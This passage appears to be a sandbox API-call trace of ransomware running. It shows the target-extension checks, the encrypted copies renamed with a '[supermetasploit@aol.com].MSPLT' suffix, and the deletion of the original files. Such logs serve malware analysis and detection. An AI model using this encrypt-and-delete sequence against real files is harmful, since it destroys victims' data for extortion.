(lpString="C:\\588bce7c90097ed212\\1042\\SetupResources.dll") returned 45 [0171.813] lstrlenW (lpString=".jpg") returned 4 [0171.813] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0171.813] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0171.814] lstrlenW (lpString="SetupResources.dll") returned 18 [0171.814] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1044\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1044\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0171.814] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x355ff14 | out: lpFileSize=0x355ff14*=17752) returned 1 [0171.814] CloseHandle (hObject=0x378) returned 1 [0171.814] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1044\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1044\\setupresources.dll")) returned 0x80 [0171.814] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1044\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1044\\setupresources.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0171.814] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1044\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1044\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0171.814] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.814] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.814] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1044\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1044\\setupresources.dll.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0171.815] GetLastError () returned 0x0 [0171.815] ReadFile (in: hFile=0x378, lpBuffer=0x3b47020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b47020*, lpNumberOfBytesRead=0x355fecc*=0x4558, lpOverlapped=0x0) returned 1 [0171.881] WriteFile (in: hFile=0x37c, lpBuffer=0x3b47020*, nNumberOfBytesToWrite=0x4560, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b47020*, lpNumberOfBytesWritten=0x355fc94*=0x4560, lpOverlapped=0x0) returned 1 [0171.882] ReadFile (in: hFile=0x378, lpBuffer=0x3b47020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b47020*, lpNumberOfBytesRead=0x355fecc*=0x0, lpOverlapped=0x0) returned 1 [0171.882] WriteFile (in: hFile=0x37c, lpBuffer=0x3b47020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b47020*, lpNumberOfBytesWritten=0x355fc94*=0xf8, lpOverlapped=0x0) returned 1 [0171.883] SetEndOfFile (hFile=0x37c) returned 1 [0171.883] CloseHandle (hObject=0x37c) returned 1 [0171.885] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.885] SetEndOfFile (hFile=0x378) returned 1 [0171.886] CloseHandle (hObject=0x378) returned 1 [0171.886] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1044\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0171.887] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1044\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1044\\setupresources.dll")) returned 1 [0171.887] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\SetupResources.dll") returned 45 [0171.887] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\SetupResources.dll") returned 45 [0171.887] lstrlenW (lpString=".doc") returned 4 [0171.887] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0171.887] lstrlenW (lpString=".docx") returned 5 [0171.887] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0171.887] lstrlenW (lpString=".pdf") returned 4 [0171.887] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0171.887] lstrlenW (lpString=".xls") returned 4 [0171.887] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0171.887] lstrlenW (lpString=".xlsx") returned 5 [0171.887] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0171.887] lstrlenW (lpString=".ppt") returned 4 [0171.887] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0171.887] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\SetupResources.dll") returned 45 [0171.887] lstrlenW (lpString=".zip") returned 4 [0171.888] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0171.888] lstrlenW (lpString=".rar") returned 4 [0171.888] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0171.888] lstrlenW (lpString=".bz2") returned 4 [0171.888] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0171.888] lstrlenW (lpString=".7z") returned 3 [0171.888] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0171.888] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\SetupResources.dll") returned 45 [0171.888] lstrlenW (lpString=".dbf") returned 4 [0171.888] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0171.888] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\SetupResources.dll") returned 45 [0171.888] lstrlenW (lpString=".1cd") returned 4 [0171.888] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0171.888] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\SetupResources.dll") returned 45 [0171.888] lstrlenW (lpString=".jpg") returned 4 [0171.888] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0171.888] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\SetupResources.dll") returned 45 [0171.888] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\SetupResources.dll") returned 45 [0171.888] lstrlenW (lpString=".doc") returned 4 [0171.888] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0171.888] lstrlenW (lpString=".docx") returned 5 [0171.888] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0171.888] lstrlenW (lpString=".pdf") returned 4 [0171.888] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0171.888] lstrlenW (lpString=".xls") returned 4 [0171.888] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0171.889] lstrlenW (lpString=".xlsx") returned 5 [0171.889] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0171.889] lstrlenW (lpString=".ppt") returned 4 [0171.889] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0171.889] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\SetupResources.dll") returned 45 [0171.889] lstrlenW (lpString=".zip") returned 4 [0171.889] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0171.889] lstrlenW (lpString=".rar") returned 4 [0171.889] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0171.889] lstrlenW (lpString=".bz2") returned 4 [0171.889] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0171.889] lstrlenW (lpString=".7z") returned 3 [0171.889] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0171.889] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\SetupResources.dll") returned 45 [0171.889] lstrlenW (lpString=".dbf") returned 4 [0171.889] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0171.889] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\SetupResources.dll") returned 45 [0171.889] lstrlenW (lpString=".1cd") returned 4 [0171.889] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0171.889] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\SetupResources.dll") returned 45 [0171.889] lstrlenW (lpString=".jpg") returned 4 [0171.889] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0171.889] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0171.890] lstrlenW (lpString="SetupResources.dll") returned 18 [0171.890] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1053\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1053\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0171.890] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x355ff14 | out: lpFileSize=0x355ff14*=17752) returned 1 [0171.890] CloseHandle (hObject=0x378) returned 1 [0171.890] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1053\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1053\\setupresources.dll")) returned 0x80 [0171.890] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1053\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1053\\setupresources.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0171.890] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1053\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1053\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0171.890] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.890] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.891] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1053\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1053\\setupresources.dll.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0171.891] GetLastError () returned 0x0 [0171.891] ReadFile (in: hFile=0x378, lpBuffer=0x3b47020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b47020*, lpNumberOfBytesRead=0x355fecc*=0x4558, lpOverlapped=0x0) returned 1 [0172.239] WriteFile (in: hFile=0x37c, lpBuffer=0x3b47020*, nNumberOfBytesToWrite=0x4560, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b47020*, lpNumberOfBytesWritten=0x355fc94*=0x4560, lpOverlapped=0x0) returned 1 [0172.241] ReadFile (in: hFile=0x378, lpBuffer=0x3b47020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b47020*, lpNumberOfBytesRead=0x355fecc*=0x0, lpOverlapped=0x0) returned 1 [0172.241] WriteFile (in: hFile=0x37c, lpBuffer=0x3b47020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b47020*, lpNumberOfBytesWritten=0x355fc94*=0xf8, lpOverlapped=0x0) returned 1 [0172.241] SetEndOfFile (hFile=0x37c) returned 1 [0172.241] CloseHandle (hObject=0x37c) returned 1 [0172.242] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.243] SetEndOfFile (hFile=0x378) returned 1 [0172.244] CloseHandle (hObject=0x378) returned 1 [0172.244] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1053\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0172.244] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1053\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1053\\setupresources.dll")) returned 1 [0172.245] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\SetupResources.dll") returned 45 [0172.245] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\SetupResources.dll") returned 45 [0172.245] lstrlenW (lpString=".doc") returned 4 [0172.245] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0172.245] lstrlenW (lpString=".docx") returned 5 [0172.245] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0172.245] lstrlenW (lpString=".pdf") returned 4 [0172.245] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0172.245] lstrlenW (lpString=".xls") returned 4 [0172.245] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0172.245] lstrlenW (lpString=".xlsx") returned 5 [0172.245] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0172.245] lstrlenW (lpString=".ppt") returned 4 [0172.245] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0172.245] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\SetupResources.dll") returned 45 [0172.245] lstrlenW (lpString=".zip") returned 4 [0172.245] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0172.245] lstrlenW (lpString=".rar") returned 4 [0172.245] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0172.245] lstrlenW (lpString=".bz2") returned 4 [0172.245] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0172.245] lstrlenW (lpString=".7z") returned 3 [0172.245] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0172.246] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\SetupResources.dll") returned 45 [0172.246] lstrlenW (lpString=".dbf") returned 4 [0172.246] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0172.246] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\SetupResources.dll") returned 45 [0172.246] lstrlenW (lpString=".1cd") returned 4 [0172.246] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0172.246] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\SetupResources.dll") returned 45 [0172.246] lstrlenW (lpString=".jpg") returned 4 [0172.246] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0172.246] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\SetupResources.dll") returned 45 [0172.246] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\SetupResources.dll") returned 45 [0172.246] lstrlenW (lpString=".doc") returned 4 [0172.246] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0172.246] lstrlenW (lpString=".docx") returned 5 [0172.246] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0172.246] lstrlenW (lpString=".pdf") returned 4 [0172.246] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0172.246] lstrlenW (lpString=".xls") returned 4 [0172.246] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0172.246] lstrlenW (lpString=".xlsx") returned 5 [0172.246] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0172.246] lstrlenW (lpString=".ppt") returned 4 [0172.246] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0172.246] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\SetupResources.dll") returned 45 [0172.246] lstrlenW (lpString=".zip") returned 4 [0172.246] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0172.246] lstrlenW (lpString=".rar") returned 4 [0172.246] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0172.247] lstrlenW (lpString=".bz2") returned 4 [0172.247] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0172.247] lstrlenW (lpString=".7z") returned 3 [0172.247] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0172.247] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\SetupResources.dll") returned 45 [0172.247] lstrlenW (lpString=".dbf") returned 4 [0172.247] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0172.247] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\SetupResources.dll") returned 45 [0172.247] lstrlenW (lpString=".1cd") returned 4 [0172.247] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0172.247] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\SetupResources.dll") returned 45 [0172.247] lstrlenW (lpString=".jpg") returned 4 [0172.247] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0172.247] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0172.247] lstrlenW (lpString="SetupResources.dll") returned 18 [0172.247] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2070\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\2070\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0172.248] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x355ff14 | out: lpFileSize=0x355ff14*=18776) returned 1 [0172.248] CloseHandle (hObject=0x378) returned 1 [0172.248] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\2070\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\2070\\setupresources.dll")) returned 0x80 [0172.248] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\2070\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\2070\\setupresources.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0172.248] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2070\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\2070\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0172.248] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.248] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.248] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2070\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\2070\\setupresources.dll.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0172.259] GetLastError () returned 0x0 [0172.259] ReadFile (in: hFile=0x378, lpBuffer=0x3b47020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b47020*, lpNumberOfBytesRead=0x355fecc*=0x4958, lpOverlapped=0x0) returned 1 [0172.266] WriteFile (in: hFile=0x344, lpBuffer=0x3b47020*, nNumberOfBytesToWrite=0x4960, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b47020*, lpNumberOfBytesWritten=0x355fc94*=0x4960, lpOverlapped=0x0) returned 1 [0172.268] ReadFile (in: hFile=0x378, lpBuffer=0x3b47020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b47020*, lpNumberOfBytesRead=0x355fecc*=0x0, lpOverlapped=0x0) returned 1 [0172.268] WriteFile (in: hFile=0x344, lpBuffer=0x3b47020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b47020*, lpNumberOfBytesWritten=0x355fc94*=0xf8, lpOverlapped=0x0) returned 1 [0172.268] SetEndOfFile (hFile=0x344) returned 1 [0172.268] CloseHandle (hObject=0x344) returned 1 [0172.272] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.272] SetEndOfFile (hFile=0x378) returned 1 [0172.274] CloseHandle (hObject=0x378) returned 1 [0172.274] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\2070\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0172.274] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\2070\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\2070\\setupresources.dll")) returned 1 [0172.274] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\SetupResources.dll") returned 45 [0172.274] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\SetupResources.dll") returned 45 [0172.274] lstrlenW (lpString=".doc") returned 4 [0172.274] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0172.274] lstrlenW (lpString=".docx") returned 5 [0172.275] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0172.275] lstrlenW (lpString=".pdf") returned 4 [0172.275] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0172.275] lstrlenW (lpString=".xls") returned 4 [0172.275] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0172.275] lstrlenW (lpString=".xlsx") returned 5 [0172.275] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0172.275] lstrlenW (lpString=".ppt") returned 4 [0172.275] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0172.275] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\SetupResources.dll") returned 45 [0172.275] lstrlenW (lpString=".zip") returned 4 [0172.275] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0172.275] lstrlenW (lpString=".rar") returned 4 [0172.275] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0172.275] lstrlenW (lpString=".bz2") returned 4 [0172.275] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0172.275] lstrlenW (lpString=".7z") returned 3 [0172.275] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0172.275] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\SetupResources.dll") returned 45 [0172.275] lstrlenW (lpString=".dbf") returned 4 [0172.275] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0172.275] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\SetupResources.dll") returned 45 [0172.275] lstrlenW (lpString=".1cd") returned 4 [0172.275] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0172.275] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\SetupResources.dll") returned 45 [0172.275] lstrlenW (lpString=".jpg") returned 4 [0172.275] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0172.276] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\SetupResources.dll") returned 45 [0172.276] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\SetupResources.dll") returned 45 [0172.276] lstrlenW (lpString=".doc") returned 4 [0172.276] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0172.276] lstrlenW (lpString=".docx") returned 5 [0172.276] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0172.276] lstrlenW (lpString=".pdf") returned 4 [0172.276] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0172.276] lstrlenW (lpString=".xls") returned 4 [0172.276] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0172.276] lstrlenW (lpString=".xlsx") returned 5 [0172.276] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0172.276] lstrlenW (lpString=".ppt") returned 4 [0172.276] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0172.276] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\SetupResources.dll") returned 45 [0172.276] lstrlenW (lpString=".zip") returned 4 [0172.276] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0172.276] lstrlenW (lpString=".rar") returned 4 [0172.276] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0172.276] lstrlenW (lpString=".bz2") returned 4 [0172.276] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0172.276] lstrlenW (lpString=".7z") returned 3 [0172.276] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0172.276] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\SetupResources.dll") returned 45 [0172.276] lstrlenW (lpString=".dbf") returned 4 [0172.276] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0172.276] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\SetupResources.dll") returned 45 [0172.276] lstrlenW (lpString=".1cd") returned 4 [0172.277] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0172.277] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\SetupResources.dll") returned 45 [0172.277] lstrlenW (lpString=".jpg") returned 4 [0172.277] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0172.277] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0172.277] lstrlenW (lpString="SetupResources.dll") returned 18 [0172.277] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3076\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\3076\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0172.278] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x355ff14 | out: lpFileSize=0x355ff14*=14168) returned 1 [0172.279] CloseHandle (hObject=0x378) returned 1 [0172.279] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\3076\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\3076\\setupresources.dll")) returned 0x80 [0172.279] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\3076\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\3076\\setupresources.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0172.279] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3076\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\3076\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0172.279] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.279] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.279] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3076\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\3076\\setupresources.dll.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0172.424] GetLastError () returned 0x0 [0172.436] ReadFile (in: hFile=0x378, lpBuffer=0x3b47020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b47020*, lpNumberOfBytesRead=0x355fecc*=0x3758, lpOverlapped=0x0) returned 1 [0172.446] WriteFile (in: hFile=0x384, lpBuffer=0x3b47020*, nNumberOfBytesToWrite=0x3760, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b47020*, lpNumberOfBytesWritten=0x355fc94*=0x3760, lpOverlapped=0x0) returned 1 